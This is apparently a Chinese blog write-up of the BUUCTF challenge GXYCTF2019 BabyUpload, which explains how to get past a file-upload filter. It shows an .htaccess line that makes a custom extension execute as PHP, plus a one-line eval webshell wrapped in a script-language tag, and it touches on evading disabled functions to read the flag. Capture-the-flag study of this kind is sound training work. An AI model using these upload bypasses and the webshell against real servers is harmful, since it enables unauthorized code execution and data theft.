【BUU】[GXYCTF2019]BabyUpload

1.本题知识:

  • 图片尺寸小于2000字节,但对文件头没有检验。
  • 检验content-type且只能为jp(e)g,png与gif都不行。
  • .htaccess配置文件替换。
  • 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。

2.别人的wp很详尽,我就对被拦截的情况来阐述吧:

  • 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。
AddType application/x-httpd-php .hhl //后缀随便改,但必须与之后上传的文件名对应。
  • 诶,别蒙我啊,这标志明显还是php啊:将php声明改为,因为刻印看见bp返回头包中php版本,此时对这个声明也有效。
<script language="php">eval($_GET['shell']);</script>
  • 函数被禁,system(‘cat /flag’)没用了,但禁了没完全禁,常见命令执行函数绕过还是会的,各种读取文件函数及输出函数读就行了:
    【BUU】[GXYCTF2019]BabyUpload_第1张图片
    在这里插入图片描述
    参考:https://blog.csdn.net/mochu7777777/article/details/115189920
//有段时间没做ctf了,今天刚做第一个题就卡壳了,还是太菜了

你可能感兴趣的:(CTF,web安全,安全)